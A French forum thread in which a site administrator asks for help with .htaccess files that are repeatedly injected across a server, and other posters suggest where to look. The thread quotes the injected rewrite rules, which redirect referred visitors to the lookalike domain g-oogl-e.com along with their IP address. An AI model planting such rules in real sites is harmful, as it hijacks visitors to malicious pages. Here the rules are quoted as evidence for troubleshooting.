Discussion :

[jacou]

Bonjour,

Depuis deux mois toutes les 2 semaines env., un de nos sites est
injecté dans .htaccess le contenu suivant:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://g-oogl-e.com/%{REMOTE_ADDR}

Ceci est dans tous les sous-répertoires sans exception (env. 1000 sous-reps).

J'ai vidé le contenu de .htaccess puis changé le droit d'accès par 'chmod 644 .htaccess', ceci n'a pas d'effet sur le hacking qui revient régulièrement.

Le site est hébergé en Linux-debian, utilisant PHP4 - MYSQL 5.
J'ai examiné le log de pure-ftp, .htaccess n'est pas uploadé par ftp... en effet il n'y a pas de trace d'uploading des fichiers .htaccess.

Pourriez-vous m'ader SVP ?

[edited]Conséquence: rien dans le site ne fonctionne.[/edited]

[sevyc64]

Je vais certainement dire une connerie, je n'y connais rien, mais si tu ne vois pas trace d'upload, tes fichiers htaccess ne seraient pas modifiés en local sur le serveur par un processus qui tournerais en tache de fond ? Un processus que tu ne supprimerais pas lors de tes interventions et qui aurait été injecté il y a un bon moment.
(A condition que ce soit possible)

[jacou]

Bonjour sevyc64,

Merci de ta réponse... Je vais examiné les
scripts de crond, ceci est très rapide.... Mais probablement dans la DB MySQL, très difficile a détecter dans des Mégas de texte UTF-8... Je crains qu'on ne peut pas rechercher simplement par une commande grep avec du texte ASCII.

[jacou]

J'ai examiné les scripts sous cron.d, apparement il n'y a pas de suspect. Par ailleurs je liste des processus lancés par le compte du propriétaire web par

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
ps -u www-data
  PID TTY          TIME CMD
 7093 ?        00:00:06 apache2
 7625 ?        00:00:04 apache2
 9075 ?        00:00:10 apache2
 9137 ?        00:01:10 apache2
 9163 ?        00:00:21 apache2
 9166 ?        00:00:01 apache2
 9329 ?        00:00:07 apache2
 9482 ?        00:00:19 apache2
 9569 ?        00:00:17 apache2
 9570 ?        00:00:09 apache2
 9624 ?        00:00:00 apache2
 9646 ?        00:00:12 apache2
 9702 ?        00:00:15 apache2
 9833 ?        00:00:11 apache2
 9849 ?        00:00:10 apache2
 9897 ?        00:00:00 apache2
 9927 ?        00:00:04 apache2
 9972 ?        00:00:03 apache2
 9977 ?        00:00:02 apache2
10021 ?        00:00:02 apache2
10034 ?        00:00:01 apache2
10060 ?        00:00:00 apache2
10065 ?        00:00:00 apache2
10073 ?        00:00:00 apache2

Il n'y a que le serveur apache2... pas de script malveillant exécutant comme tâche de fond...

[sevyc64]

D'après Google (le vrai ) il s'agira d'un virus relativement difficile à enlever.

Si ton serveur est hébergé, contacte l'hébergeur car, à priori, c'est le serveur (machine) qui est touché, pas uniquement le site web. Si tu es en mutualisé, certainement que d'autres sites du même serveur sont touchés.

Si tu héberge toi-même ton serveur, essaye de passer un bon antivirus à jour, et un bon antimalware.

Vérifie aussi que ce n'est pas ton poste (celui qui te sert à administrer ton site) qui est infecté.

En faisant une recherche sur le terme "g-oogl-e" (avec les guillemets) dans google, on trouve des sites qui propose des outils pour enlever le virus. Ces outils semble être à priori pour Windows.
Comme je ne connais pas le professionnalisme et l'honnêteté des sites où ces outils sont proposés, je ne met pas de lien ici.

[jacou]

Merci à tous de m'avoir répondu.

D'après Google (le vrai ) il s'agira d'un virus relativement difficile à enlever.

Mauvaise nouvelle.

Si ton serveur est hébergé, contacte l'hébergeur car, à priori, c'est le serveur (machine) qui est touché, pas uniquement le site web.

C'est une configuration Serveur Dédié Virtuel. J'ai déjà contacté l'hébergeur il a répondu de nous débrouiller tout seul.

En faisant une recherche sur le terme "g-oogl-e" (avec les guillemets) dans google, on trouve des sites qui propose des outils pour enlever le virus. Ces outils semble être à priori pour Windows.
Comme je ne connais pas le professionnalisme et l'honnêteté des sites où ces outils sont proposés, je ne met pas de lien ici.

Bon indice que je vais approfondir... J'ai quand même Norton Antivirus 2011 et depuis 6ans env. abonnement sans interruption...

[JeitEmgie]

'chmod 644 .htaccess', ceci n'a pas d'effet sur le hacking qui revient régulièrement.

6 = writable par le owner
si l'intrus tourne sous ce compte vous n'êtes pas prêt de l'empêcher de sévir.